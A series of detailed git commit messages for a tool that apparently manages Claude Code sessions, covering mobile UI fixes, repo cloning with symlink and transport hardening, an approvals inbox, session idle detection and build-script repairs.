* Ctrl joins the refocus set, so tapping it keeps the terminal focused and
the keyboard open.
* The armed style needs three classes to outrank mobile.css's light-skin
.accessory-btn rule at (0,2,1).
Verified end to end against a real shell session on an isolated instance:
tapping Ctrl then typing c interrupted a running `sleep 300` (^C in the
pane), the modifier disarmed, plain typing stayed literal, Ctrl+L cleared,
and a cancelled Ctrl typed a literal c.
Tests: test/mobile-shell-keyboard.test.ts (new, runs in CI) covers the
mapping table, layout selection per session mode, base-mode memory and every
disarm path; test/mobile/keyboard.test.ts adds nine browser regressions that
drive the real xterm with page.keyboard.type() and assert on the bytes that
would go out.
Closes#262
Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
With five tabs open on a phone, the right-hand tabs were effectively
unreachable. Selecting a tab only toggled the .active class, so the strip
never moved, and every full rebuild (a task badge appearing, a session
created elsewhere) replaced the strip's innerHTML, which resets scrollLeft
to 0 and yanked a mid-swipe strip back to the first tab.
Three changes, which only work together:
* computeTabScrollLeft() (pure, constants.js) decides the scroll target from
measured rects, and _scrollActiveTabIntoView() applies it on selection.
Rect math on the strip's own scrollLeft rather than scrollIntoView(), which
also scrolls ancestors: on a phone that is the document, under a fixed
header and possibly an open keyboard.
* _fullRenderSessionTabs() saves and restores scrollLeft across the rebuild,
and re-reveals the active tab only when it actually changed
(_lastRenderedActiveTabId), so a background render never undoes a manual
swipe.
* Mobile no longer hoists the active session to the front of the strip. That
reordering ran on full renders only, so tab order flipped depending on
which render path fired, and it renumbered the Alt+N badges. Scrolling the
active tab into view replaces it.
Also sets overscroll-behavior-x: contain on the strip so a swipe that runs
past the last tab stays in the strip instead of becoming the browser's back
gesture.
Tests: scroll-target math in test/tab-overflow.test.ts (runs in CI), plus
five browser regressions in test/mobile/tabs.test.ts covering reveal-on-
select in both directions, scroll preservation across an ambient rebuild,
sessionOrder rendering on phones, and a real touch drag reaching the last
tab.
Closes#257
Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
Two home-screen reports from @jordan8037310, both about history that is
present but unreachable.
#260 — "Resume Conversation" rendered 4 rows, then a button that appended
every remaining row into a `max-height: 240px` box, so 35 conversations
landed in a four-row scroll well with no ordering or filtering. Rendering
now goes through `_renderHistoryList()` over a cached corpus: 10 rows to
start, Show more/Show less that grows and shrinks the box (the height cap
is class-driven, `.history-list.expanded`), plus a filter box (name,
folder, #case label, prompts), a sort control (recent / name / folder,
pinned rows still first) and a shown-of-total count. A filter implies
expansion, so every match is visible, and the whole header hides as one
unit while a federated search is active. The A-Z sort keys off the same
string the row renders, since most rows are transcript-backed and carry
no session name at all.
#261 — the search box could not match a past project by folder name:
`harvestSources()` built its session corpus from the live in-memory map,
while past sessions come from `/api/sessions/unified` (lifecycle log +
transcript scan). Folding that scan into the request path would have cost
the search its no-filesystem-reads property, so the corpus arrives via a
bounded snapshot instead: `session-history-index.ts` is published as a
side effect of `/api/sessions/unified` (the home screen fetches it on
open, which is the same screen the search box lives on) and rebuilt
fire-and-forget, single-flight and TTL-guarded when a search finds it
stale. A result for a closed session now resumes the conversation rather
than selecting a tab that no longer exists, and is badged RESUME.
The snapshot is stored unscoped with a per-row owner and re-filtered
through canAccessOwned() on read, so multi-user sees exactly what
/api/sessions/unified exposes: own sessions only, host-wide transcript
history admin-only. Live rows are harvested first and win the dedupe.
Verified end-to-end against a real instance with 60 past sessions: cold
process answers its first search without history and its second with it;
folder-name queries return resume targets; clicking one posts the right
resumeSessionId + workingDir.
Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
The open-tabs list on the welcome screen was a fixed 256px card floating
vertically centered in the left gutter, which read as debris rather than
chrome and left 12px type stranded on a wide display.
- Dock it: left/top/bottom 0, full height, hairline right border and a soft
background fade. The centered welcome content still does not move.
- Scale it off one knob: width clamp(250px, 19vw, 430px) plus a fluid
font-size on .home-sessions, every child sized in em. Measured 250px/12.2px
at the 1180px gate, 380px/15px at 2000px, 430px/17px at 2938px; the gap to
the centered content never goes negative.
- Show when each session was first created and last active, on a full-width
footer line so it does not fight the status pill, exact dates in the title.
Both stamps refresh in place on a 20s clock (disarmed when the home screen
goes away) rather than by re-rendering, which would restart every row's
blink animation and working ring twice a minute.
- Mute idle green: dot and pill mix toward --text-muted, so idle reads as
greyed-out next to the vivid green of a working session. Mixed rather than
hardcoded, so every skin keeps its own green.
Verified in a browser at 1180/2000/2938px and on a light skin, plus
test/home-sessions.test.ts, frontend-syntax, public-assets, prettier and a
PostCSS parse of styles.css.
Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
Round 2 of the #251 review: settingsWriteBlocker covered only
writeHooksConfig and updateCaseModel, while applyStatusLineConfig,
stripCaseEnvKeys, updateCaseEnvVars, refreshStaleCodemanHooks and
ensureCodemanHooks still wrote the same repository-controlled path
unguarded (applyStatusLineConfig was demonstrated writing through a
symlinked settings.local.json).
All seven writers now go through withSafeSettingsWrite(), which runs
the blocker check INSIDE the per-path settings lock and then hands the
writer its claudeDir/settingsPath; none of them touch the settings path
directly anymore. Test pins all seven against a symlinked
settings.local.json at once (link target must stay byte-identical).
Co-Authored-By: Claude Fable 5 <noreply@anthropic.com>
Addresses all four findings from the #251 review:
- Scaffolding no longer writes through repository-controlled symlinks.
The guard lives in hooks-config.ts (settingsWriteBlocker) so it also
covers quick-start/docker/ralph writers, not just the clone route:
refuses a symlinked .claude or settings.local.json, a .claude that is
a file, or one resolving outside the case. The clone route surfaces
the refusal as a user-visible warning, and the CLAUDE.md write checks
presence via lstat so a BROKEN repo-shipped symlink counts as present
(existsSync follows links and would have created the outside target).
- Failed-clone cleanup can no longer delete a concurrent winner's tree:
git clones into an attempt-owned temp sibling (.<name>.cloning-<rand>)
which is atomically renamed into place; the loser reports
DESTINATION_EXISTS and only ever removes its own temp dir.
- decodeURIComponent(url.pathname) is guarded: malformed percent-escapes
now come back as BAD_SYNTAX instead of an uncaught URIError 500.
- The git pool's waiter queue is bounded (CODEMAN_MAX_GIT_QUEUE, default
16): overflow answers BUSY immediately (HTTP 429 via RATE_LIMITED),
and queue time counts against the operation's own deadline.
Tests: hostile symlink fixture repo (route level), settingsWriteBlocker
units, concurrent same-destination race, temp-dir leak assertions,
percent-escape rejection, and a fake-git pool-bounds suite.
Co-Authored-By: Claude Fable 5 <noreply@anthropic.com>
The feature as pitched in docs/readmymind-plan.md: pressing the header
brain button predicts the prompt you were about to type, from the case's
intent profile plus everything the session already knows.
Backend:
- readmymind-context.ts: pure budgeted context assembler (9 ranked
sources: pending approval dialog, user goals, last assistant turn tail,
recent prompts, tool activity, git workspace signals, away context,
sibling sessions, rethink state; 30 KB budget, whole-section drop from
the bottom of the ranking, trust tiers stated in the prompt)
- readmymind-collectors.ts: transcript tail reader (the live watcher
keeps only a 500-char snippet) and git signal collection (execFile,
2s timeout, skipped for remote-SSH cases)
- readmymind-predictor.ts: one-shot claude -p in a throwaway tmux
session, opus by default (readMyMindModel setting), strict JSON
contract with 1-3 suggestions (continue / verify / redirect), newline
stripping, 90s timeout; mutable singleton so route tests can stub it
- POST /api/sessions/:id/readmymind: claude-mode only (400), one
prediction in flight per session (409 CONFLICT), rethink body
{ steer, rejected }; ownership via findSessionOrFail
Frontend:
- readmymind-ui.js (loadorder 11.3): header brain button, marker-hidden
until readMyMindEnabled is ON, desktop only (phone key is phase 3);
modal with editable suggestion + rationale and Send / Insert /
Rethink / Dismiss; suggestion text rendered via value/textContent only
and nothing ever auto-sends
- App Settings -> Panels checkbox for readMyMindEnabled; en + zh-CN
strings
Verified end to end against a live isolated instance: transcript
capture, a real opus prediction grounded in the stated goals, rethink
steering, the 409, and the browser modal incl. Insert leaving the text
unsubmitted on the composer. 41 new unit/route tests; full test:ci
sweep green (4680 tests).
Co-Authored-By: Claude Fable 5 <noreply@anthropic.com>
Adds an exact-key tier (ALLOWED_ENV_KEYS) beside ALLOWED_ENV_PREFIXES in
schemas.ts, admitting CLAUDE_CONFIG_DIR so a case can run on a separate
Claude subscription (client-billed accounts). Exact match only: other
CLAUDE_* keys and near-misses like CLAUDE_CONFIG_DIR_EXTRA stay rejected,
blocked keys stay blocked. The key also survives getEnvOverridesForPersist()
(a path, not a secret; dropping it would silently switch a rebuilt session
back to the default account after a reboot).
Docs cover the transcript caveat: a relocated config dir writes transcripts
outside ~/.claude/projects, so response viewer / subagent windows /
ultracode / Read My Mind go blind for that session unless projects is
symlinked back into the shared tree.
Design and spec contributed by @jordan8037310 in #255. Closes#255.
Co-Authored-By: Claude Fable 5 <noreply@anthropic.com>
The brand "C" got a 44px-wide hit box in the previous commit but was capped at
36px tall by the bar it sits in. The phone header is now 44px, so the one
control that gets you back to the home screen is square at the platform
minimum, and every other header control gains the same 8px.
Redefined as --header-height inside the phone media query rather than as a
literal, so the panels positioned off that token (file browser, project
insights, plan overlays) follow the bar instead of drifting 8px underneath it;
.app's top offset is derived from it for the same reason. The header also stops
top-aligning its children on phones: that read as centred in a 36px bar whose
contents were ~31px, and leaves a visible gap under everything at 44px.
Costs 8px of terminal height on a phone.
Verified on a real isolated instance at 390px: header 44px, button 44x44
spanning the bar, a touch tap at (4,41) - inside the new area, outside the old
one - reaches the home screen, tabs centred, and content still clears the fixed
header. Tablet (48px) and desktop are untouched.
Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
The welcome overlay centers ~560px of content in a ~1400px window, so both
gutters are dead space. The left one now carries the open tabs as a vertical
list (home-sessions.js): one row per live session plus saved web tabs, in TAB
order rather than by urgency, because the row badges are the Alt+1..9 indices.
Clicking a row enters that session.
Working state is deliberately the phone's, exactly: a pulsing green dot ringed
by the same tab-load-spin the tab strip uses while a tab loads, now with a green
halo added on both surfaces so "working" reads identically wherever you see it.
The column is position:absolute so the centered content never moves, which is
why it needs a width gate in two places (HOME_SESSIONS_MIN_WIDTH = 1180 in JS,
a max-width: 1179px media query as the backstop for a resize that outruns the
matchMedia listener). A test pins the two equal. State classification is reused
from mobile-overview.js rather than re-derived, so the two home screens cannot
disagree about what counts as needing you.
Phones keep the mobile overview, and their brand "C" was a 0.85rem inline span,
roughly a 12x13px target on the one control that gets you back to that screen.
It is now a 44px-wide button filling the full header height, with the glyph
scaled to match. 44 is horizontal only: the phone header is pinned to 36px and
clips overflow, so a true 44x44 would mean taking height off the terminal.
Verified end to end against a real isolated instance (own tmux socket + data
dir): 18 browser checks covering render, live update through the tab renderer,
the working dot's animation/glow/ring, row click, the narrow-window gate, the
phone fallback, and a real touch tap on the far corner of the new hit box.
Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
docs/readmymind.md covers phase 1 as a user guide: how to enable the synced
readMyMindEnabled setting via the API (no UI checkbox until phase 2), exactly
what is and is not captured, the hooks dependency (Docker bridge / remote-SSH
caveats), storage and wipe paths, curl examples for the three endpoints, the
agent-skill ground rules, and a troubleshooting table. Cross-linked from the
CLAUDE.md Key Patterns entry and the api-reference section.
Co-Authored-By: Claude Fable 5 <noreply@anthropic.com>
Per-case profiles of user intent (docs/readmymind-plan.md): user-stated goals
plus the user's recently submitted prompts, captured from the Claude session
transcript behind the new synced readMyMindEnabled setting (default OFF).
- intent-store.ts: keyed by owner + realpath(workingDir), FIFO/size caps,
consecutive-dupe collapse, atomic 0600 writes to ~/.codeman/intents.json
- transcript-watcher.ts: new transcript:user_prompt event for typed user turns
(tool_result-only entries stay silent); capture wiring in server.ts is
claude-only and gated on the setting per event
- readmymind-routes.ts: GET/PUT/DELETE /api/sessions/:id/intent, ownership
via findSessionOrFail, strict Zod schema
- agent skill: SKILL.md recipe + endpoints.md rows so agents can read and
record intent (PUT replaces: read + merge; never delete unprompted)
- groundwork for the phase-2 predictor button; nothing is ever auto-sent
Co-Authored-By: Claude Fable 5 <noreply@anthropic.com>
selectSession() ends with scrollToLastNonEmptyLine(), which parks the viewport
one row ABOVE the bottom for any session whose buffer is taller than the screen
and ends in blank rows, so that is the normal state after a tab switch. Nothing
pinned that a tap there still leaves the keyboard reachable.
The blocker reduced in #173 came back through exactly that gap in #244: a tap
classifier that treats "viewport is scrolled up" as a reason to blur, paired
with touchstart preventDefault cancelling the compatibility click, closes both
routes to focus on the same gesture and strands document.activeElement on
<body> with no way to type. The prompt row is no exception.
Measured on a 390x844 viewport, claude-mode session, dispatched touch gesture:
master leaves focus on textarea.xterm-helper-textarea, PR #244's terminal-ui.js
leaves it on body. Green here, red against that branch.
The test also pins the half that IS correct: SGR coordinates are meaningless
off-bottom, so the tap must send no mouse report.
It has to be a dispatched gesture. Calling the touchend handler directly
bypasses touchstart's preventDefault, which is half of what closes the focus
path, so a direct call reports the right intent and still misses the bug.
test/mobile/keyboard.test.ts: 4 failed | 32 passed (36), against 4 failed |
31 passed (35) without it. Same four pre-existing failures either way.
Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
The working dot is the one glance-state a phone needs: busy tabs now get a
9px pulsing dot with a green glow (idle stays 4px). The glow needs !important
because the skin block's no-halo rule outranks mobile.css.
The simple keyboard accessory bar swaps /clear for Tab (/clear and /compact
stay in the extended bar with their double-tap confirm). The tab action now
flushes locally-buffered prompt text to the PTY before sending \t, so
completion applies to what was just typed instead of an empty composer.
Co-Authored-By: Claude Fable 5 <noreply@anthropic.com>
Adds an Add Case -> "Clone Repo" tab plus two endpoints, implementing
@DodgyBadger's proposal in #236: clone a public repository straight into
codeman-cases/<name> and register it as a normal local case.
POST /api/cases/clone is synchronous by design (request held open, bounded
by GIT_CLONE_TIMEOUT_MS): no job store, no polling, no cancellation
surface. Success broadcasts the usual case:created event, so the case
still appears when a proxy idle-timeout kills the request mid-clone.
POST /api/cases/clone-preflight runs `git ls-remote --symref` so the UI can
say, while the user is still typing, whether the URL is cloneable without
credentials, what its default branch is, and which branches/tags exist.
Core lives in src/git-clone.ts, split into a pure half (URL parse, argv/env,
ls-remote parse, stderr classification) and a thin IO half, so every
security decision is unit-testable without spawning anything:
- `<name>::<payload>` transports are refused as a family, not by name:
ext:: is the famous one, but any of them dispatches to git-remote-<name>
and turns a clone into arbitrary command execution.
- A leading `-` is refused AND every spawn puts `--` before the operands.
Either alone is one edit away from being a hole.
- argv arrays, never a shell. URLs carrying user:password@ are refused.
- gitNonInteractiveEnv() closes all four ways git can block on a prompt
with no terminal attached (terminal prompt, askpass/GUI, ssh, GCM).
HOME/PATH stay inherited, so a user's own credential helper or ssh agent
keeps working; Codeman itself collects and stores nothing.
- The timeout signals the process GROUP, since clone fans out into
git-remote-https/index-pack children that outlive a signal to the parent.
- Bounded output (redacted stderr tail, capped ls-remote stdout, 500 refs
each) and a global 2-op pool, so N large clones cannot exhaust the host.
Repository contents beat scaffolding: an existing CLAUDE.md is kept, hooks
are merged into whatever .claude/settings.local.json the repo shipped, and
a repo that ships its own Claude settings is reported back as a warning
(those hooks run locally as soon as a session starts there). A failed clone
removes only the directory the attempt created, and refuses a pre-existing
destination outright, so it can never squat on a case name.
Not admin-gated in multi-user mode, unlike /api/cases/link: it writes only
inside the caller's own case space. Local-path/file:// sources are the
exception and stay admin-only there.
UI: live verdict under the URL field, case name filled from the parsed repo
until the user types their own, branch/tag as a datalist of the remote's
real refs, optional shallow clone, and a Brain picker (installed CLIs only)
that points the Run button at the chosen agent. Starting a session stays
opt-in. The tab hides itself when the server reports no git.
Tests: the pure half exhaustively (every refusal has a case), plus real git
against a real local bare repo for clone/ref/timeout/cleanup, and a
route-level suite with unmocked fs that clones through the endpoint.
Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
The picker behind Link Existing's "Browse" and the mobile keyboard's Path key
refused every path with a dot-prefixed segment, so `.github/workflows/ci.yml`
could not be selected and a hidden folder could not be opened at all. It gains
the same `.*` toggle as the File Viewer: default OFF, per-device, and applied to
both the listing and the preview endpoint, which re-resolves the path
independently.
That dotfile filter was quietly doing security work. The picker's roots include
Home, so with every hidden path unreachable the shared blocklist never had to
name the credentials that live in dot-directories. Lifting the filter removes
that accident, so `isSensitivePath` now covers them explicitly: SSH keys at any
depth rather than only under $HOME, GPG keyrings, AWS/GCloud/Azure/Docker/
Kubernetes credentials, npm, Yarn, git, gh, netrc, PyPI, RubyGems, Cargo and
Terraform tokens, .pgpass and .my.cnf, and the Claude and Codeman agent
credentials. `~/.codeman/` and `~/.claude/` stay attachable as trees, since the
publish skill and the review-card loop read from them; only their secret-bearing
members are named.
Everything else still applies with the toggle on: blocked trees, sensitive
files, root confinement, ownership scoping and symlink-escape checks. A hidden
entry whose realpath is a secret is dropped from the listing, and opening it is
refused.
Follows #221
Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
One switch now governs the whole feature: with approvalsInboxEnabled off
(the default), sendPushNotifications strips the actions and approvalId
from permission push payloads, so the buttons no longer render at all
(pre-inbox they rendered and did nothing). The page-side action relay is
gated the same way for stale notifications sent before the toggle
flipped. Only the store and answer endpoints keep running, so enabling
the toggle surfaces anything already pending immediately.
sendPushNotifications is async now (cached settings read); all call
sites were already fire-and-forget. Covered by three new payload tests
alongside the existing hostTitle suite.
Co-Authored-By: Claude Fable 5 <noreply@anthropic.com>
A session on a fresh directory sat on Claude's "Quick safety check: Is
this a project you created or one you trust?" dialog until a human
pressed Enter. Reproduced on a new case, then read off the wire:
1.\x1b[C Yes,\x1b[C I\x1b[C trust\x1b[C this\x1b[C folder
tmux repaints a row by writing each word followed by a cursor-forward
escape instead of a space, and Ink colours each word separately, so
`data.includes('trust this folder')` could never match a chunk. The
spaces are not there to strip: they were never sent. The auto-accept has
been dead for every session that hit the dialog.
Match on whitespace-free, ANSI-free, lowercased text instead
(`compactScreenText`), which survives both that repaint style and the
spaced full-screen redraw.
Answering means pressing Enter into a session, so three guards bound it:
- Read the RENDERED SCREEN (capturePaneText), not the chunk. The terminal
buffer is append-only and keeps the dialog in its tail long after it
has been answered, so a retry driven off the buffer would type into a
live session. Direct-PTY sessions, which have no pane, fall back to a
short buffer tail.
- Require a trust phrase AND the dialog's own confirm affordance. One
phrase is not enough, since an agent's transcript can quote it.
- Only look during the first 90s of the pane's life, and cap it at three
attempts. Ink can drop a keystroke while it is still mounting the
widget, which is the other half of why sessions got stuck, but a
dialog that will not clear must not become an Enter loop.
Verified end to end on a fresh case: dialog answered on attempt 1, one
Enter sent in total, session went straight to the composer and answered a
prompt. Before the fix the same flow parked on the dialog indefinitely.
Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
Opening Codeman with nothing reachable (phone off the tailnet, VPN down,
server stopped) rendered a normal-looking UI: the service worker serves the
cached app shell, every /api call fails, and the only tell was an 8px red dot
in the header corner. On a phone that reads as "there are no sessions".
Two surfaces, chosen by whether there is anything worth looking at:
- Full-screen overlay while no server state has loaded this page load. It
names the host, lists the three things to check (network, VPN/Tailscale,
server), counts down to the next retry, and offers "Retry now" plus
"Show cached view" to demote itself to the banner.
- Non-blocking banner once state HAS loaded, so a mid-session drop leaves the
terminal scrollback readable.
A 2.5s grace keeps a COM deploy (SSE is back in ~200ms) from flashing the
banner every release; navigator.onLine === false skips the grace, since the
device saying "no network" is never a blip. Retry re-arms the terminal
WebSocket as well as SSE: planWsReconnect can give up outright, and the SSE
backoff caps at 30s, so waiting it out is not always an option.
The decision is pure (computeConnectionLossUi in constants.js, unit-tested in
a node VM like the WS reconnect policy); app.js only writes the DOM.
Owner decision: every Approvals Inbox UI surface (header bell, drawer,
phone overview answer strips, reload seeding) now requires enabling
approvalsInboxEnabled in App Settings -> Panels; only an explicit true
turns it on. The store, endpoints, and push Approve/Deny actions keep
running regardless (the push buttons are already opt-in per subscription).
Also replaces em-dashes with plain punctuation across the newly authored
comments, docs, and strings.
Co-Authored-By: Claude Fable 5 <noreply@anthropic.com>
The tree endpoint has accepted `showHidden=true` since it was written; the
panel hardcoded `showHidden=false`, so dot-prefixed entries were unreachable
from the File Viewer and opening one meant guessing its path.
Adds a `.*` toggle to the panel header. It re-fetches instead of re-rendering
the cached tree (the filtering is server-side), preserves the expanded
directories so toggling does not collapse the tree, and persists per-device to
its own `codeman:fileBrowserShowHidden` key. That key is deliberately not part
of the app-settings object, which `saveAppSettings()` rebuilds from the
settings-modal DOM and would drop it on the next save.
Default is OFF, so an untouched install behaves exactly as before.
Closes#221
Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
The overview already had a `working` state; nothing ever reached it,
because the status it reads was wrong (see previous commit). Now that a
row can actually be in it, the state needed to look like something.
- The row gets a slow green breathing edge (2.2s). Deliberately calmer
and slower than the red/yellow alert blinks, since working is not an
alert and must not compete with the two states that do want you.
- The dot keeps its `pulse` and picks up a spinning ring: the same 2px
ring with a bright leading edge that a tab shows while it loads,
reusing the `tab-load-spin` keyframes from styles.css rather than
re-declaring them, so the two cannot drift. Green rather than the tab's
blue because here it means "running", not "loading": the motion is the
shared part, the color still belongs to the state.
- The pill animates "working ...".
Reduced motion drops all three to static: a green edge, a full ring, a
static ellipsis.
Verified in headless Chromium at 390px against a live working session:
row breathe-green, dot pulse plus tab-load-spin ring, pill dots.
Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
Every working Claude session reported `status: "idle"` about two seconds
into its turn. Measured on live workers: two sessions mid-tool-call at 13
and 17 minutes both read `idle` while their panes showed
`✻ Actualizing… (13m 23s · ↓ 47.5k tokens)`.
Two things had drifted apart:
1. The working indicator changed. Claude animates the glyph through
`· ✢ ✳ ∗ ✻ ✽` and randomizes the gerund per turn, so neither
SPINNER_PATTERN (braille, no longer drawn) nor the keyword list
(Thinking/Writing/Reading/Running) matches a turn anymore.
2. A `❯` sighting is not the end of a turn. Claude redraws the composer
roughly once a second all the way through one, and that redraw armed
the "2s later, call it idle" timer.
Matching the new status line in the STREAM does not fix it either: tmux
ships partial repaints, so the complete line reached the PTY about once
every 20 seconds while the `❯` arrived every second.
So the decision moves off the stream:
- An unbroken run of repaints marks a turn as started. Sampled once a
second for 12s over six live sessions, the two working ones produced
output in 12/12 windows and the four idle ones in 0/12. Pure helpers in
session-activity.ts carry the thresholds.
- Idle now needs the pane to go quiet AND the screen to agree.
`_confirmIdle()` asks tmux what is rendered (new `capturePaneText()`,
one plain `capture-pane`, floored at 1.5s per session and only ever at
a transition) and re-checks every 5s while the screen still shows work.
A turn can sit silent for tens of seconds inside one tool call, so
silence alone proves nothing.
- The same screen check vetoes keystroke echo, which is a steady stream
of repaints too but is not work.
CLAUDE_WORKING_LINE_PATTERN matches the `… (elapsed)` shape rather than
the glyph, because the FINISHED line (`✻ Cooked for 2m 49s`) carries the
same glyph and would otherwise pin a session at working forever.
Claude mode only. An external CLI has no `❯`, so nothing would arm the
confirmation and such a session would latch busy.
respawn-patterns.hasWorkingPattern() had the same blind spot (its gerund
list cannot see "Actualizing"), so it takes the pattern as an extra
signal. That can only make respawn less eager, never more.
Idle now lands about 3 to 5 seconds after a turn ends instead of 2
seconds into one. Verified end to end against a live worker, sampled
against the CLI's own "esc to interrupt" footer as independent ground
truth: busy for all 25s of a turn, idle 3s after it ended.
Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
Permission dialogs, AskUserQuestion questions and idle prompts from every
session now land in a server-side inbox (web/approval-inbox.ts, one item per
session, claude-mode only) and are answerable in place: a header bell + drawer
on desktop, inline answer strips on the phone overview's NEEDS YOU rows, and
working push Approve/Deny buttons (previously dead ends, now answered straight
from sw.js with no tab open). Pending alerts survive reloads because the
frontend seeds from GET /api/approvals on init.
Answering sends the digit / Esc / prompt text through the existing tmux input
path; option digits are accepted only when they match options parsed from the
captured pane frame, and the answer path re-captures the pane first so a
dialog that already left the screen refuses with 409 instead of typing into
the composer. New elicitation_complete / elicitation_response hook matchers
resolve question items the moment they are answered in the terminal;
refreshStaleCodemanHooks heals existing cases.
Verified end-to-end against a live claude session: a real AskUserQuestion
dialog parsed into 5 option buttons and was answered from the drawer.
Co-Authored-By: Claude Fable 5 <noreply@anthropic.com>
Version-gated fail-closed at 2.1.224 (the cross-session-messaging release,
flag presence verified against that binary): an unknown or older CLI yields
a spawn command byte-identical to before, because claude aborts startup on
an unknown option and that would kill every session spawn. The value is
allowlist-sanitized ahead of the double-quoted interpolation, and only the
local command carries the flag; docker/remote builders never see it since
their CLI is not the probed binary. Verified E2E on an isolated instance:
cmdline shows --name, ListAgents lists the session name, replies arrive
tagged from-name.
Co-Authored-By: Claude Fable 5 <noreply@anthropic.com>
Claude Code v2.1.224+ gives sessions ListAgents/SendMessage and a per-session
inbox socket. Codeman's claude workers are ordinary local Claude Code sessions,
so the agent skill now teaches task delivery and result collection over
messaging where available (multi-line exactly-once messages, mid-turn steering,
latched replies), with the HTTP primitives keeping spawn, readiness,
synchronization, liveness and delete, and a bounded fallback to the HTTP
recipes whenever the feature is absent. All mechanics verified live against
claude-cli 2.1.226.
Co-Authored-By: Claude Fable 5 <noreply@anthropic.com>
Measured on a live claude worker: `GET /api/v1/sessions/:id` reported
`status: "idle"` while the worker was mid-turn and actively producing output, with
`lastActivityAt` equal to the moment of the call. The skill already warned that a
worker which dies inside its pane also reads `idle`, so the field is unreliable in
both directions and nothing an agent does should depend on it.
Synchronize on `stop` via send-and-wait or on an output marker. To judge from
outside, sample `terminal?tail=` twice a few seconds apart: a changing buffer is the
only cheap positive proof a worker is still working. `wait?until=exit` stays the
death check.
Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
Second review round on the #241 follow-ups. Three defects in my own previous commit,
each reproduced before and after.
1. The temp path was shared between runs (`${dest}.tmp`), so two concurrent runs
fought over it: 4 of 4 concurrent pairs had one run die. Worse than a crash, a
sibling's cleanup landing between the esbuild and the alias append makes
`appendFileSync` CREATE the file, so the rename publishes a bundle-less file
containing only the alias tail, which still satisfies the content check and
would be blessed by the cache forever. The name now carries the owning pid.
8 concurrent pairs afterwards: no failures, no strays, aliases intact.
2. The content check only covered the bundle, so a truncated xterm.min.js with a
fresh mtime stayed truncated. This script can no longer produce one, but
postinstall.js writes the same directory in place, so a Ctrl+C during
`npm install` does, and a 200-byte xterm.min.js means `Terminal` is undefined
and every mobile test dies on a null. A copy must now match its source byte for
byte, and a derived output must clear a floor far below the real ratios
(measured 0.97-1.00 minified, 0.51 for the bundle) while a truncation misses by
orders of magnitude. Verified: 200-byte and 50-byte poisonings both repaired.
3. The try block ended before the append and rename, so a rename failure leaked its
temp behind a raw stack. It now covers both and reports which asset failed.
Per-pid names mean a killed run's temp is never reclaimed by a later rebuild, so
startup sweeps temps whose owning process is gone, and only those: `kill(pid, 0)`
throwing ESRCH. Deleting a live run's temp would recreate the collision fix 1
removes. Verified both directions, plus SIGKILL mid-build leaving no litter. The
sweep swallows its own errors, because reclaiming litter must never fail the run:
a directory named like a dead temp otherwise crashed the whole prepare step.
Security-reviewed: no shell (execFileSync with an array, `shell` unset), every
argument from the static asset table plus a numeric pid, all writes confined to the
vendor dir under strace, `process.kill` only ever with signal 0 (and pid 0 skipped,
since to kill(2) it means this process group), no new dependencies, no network, no
eval, nothing published. The emitted browser bundle is byte-identical to the one
scripts/build.mjs ships, tail included.
Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
Follow-ups to #241 (thanks @Lint111), from an independent review of that PR. The
script is a real fix for a real gap; these are the four defects the review found,
each reproduced before and after.
1. A wrong-but-fresh output was never repaired. The zerolag bundle is finished by a
SECOND step (the alias append), so anything landing between esbuild and the
append is permanent: the file looks complete, carries a current mtime, and the
mtime-only cache reports "up to date" forever while the suite dies on
`LocalEchoOverlay is not defined`. Reproduced by replaying #241's own two
commits: running the first and then pulling the second kept the broken bundle.
Fixed twice over, because the two halves address different cases. Builds now go
to a temp file and `renameSync` into place, so this script can never publish a
half-written output (that also covers an interrupted esbuild or copy, and two
concurrent runs). And `isFresh` verifies the bundle actually contains its alias
tail, which is what repairs a file an EARLIER version already poisoned; a rename
alone cannot fix what is already on disk.
2. Freshness compared against the entry file only, but esbuild bundles its four
siblings too, so editing overlay-renderer.ts left the suite testing a stale
overlay while reporting "up to date". Editing those siblings is exactly the
single-source workflow CLAUDE.md mandates. It now stats every `.ts` in the
package source dir. A full rebuild is ~2s, so the cache was not buying much.
3. `execFileSync('npx', ...)` passed no cwd, unlike scripts/build.mjs, so a run from
another directory missed the repo's pinned esbuild and would fetch an unpinned
one from the registry. Both calls now pass `cwd: ROOT`.
4. Every invocation in test/mobile/README.md was a bare `npx vitest`, which skips
the `pretest:mobile` hook npm only fires for `npm run test:mobile`, so the
documented commands all bypassed the fix. Rewritten, with a note on why.
Also: an esbuild failure printed a raw stack; it now names the asset and its input,
matching the missing-input message. And the header comment no longer implies the
vendor dir is always empty: scripts/postinstall.js already writes these same seven
outputs, so what this script adds is freshness and independence from install time.
Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
Three gaps found while auditing the agent skill.
`codeman skill install` / `uninstall` had no tests at all, including the linked-case
resolution that shipped in 1.14.2 with nothing guarding it. Covered now: global target
resolution, `--case` resolving through linked-cases.json, `--case` falling back to the
cases dir for an unlinked name, a missing or malformed registry degrading to the
fallback instead of throwing, and a nonexistent case being rejected. `resolveSkillTarget`
called `process.exit(1)` for a missing case, which would have killed the test runner, so
the pure resolution is split out and exported; CLI behavior is unchanged.
The `POST /api/sessions` injection call site was never exercised, because the shared
route mock hardcoded the gate off. The mock's gate is overridable per test now (default
still off, since other tests rely on that), and there is coverage that the path injects
when the setting is on, does not when it is off, and is claude-mode gated.
Nothing guarded skills/codeman/reference/endpoints.md against drifting from the routes
it documents, which is how it drifted in the first place. A static guard parses the
endpoints out of the markdown and asserts each is really registered, tolerating the
/api/v1 alias and path params.
Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
README.zh-CN.md taught a recipe that cannot work: its programmatic-input example had no
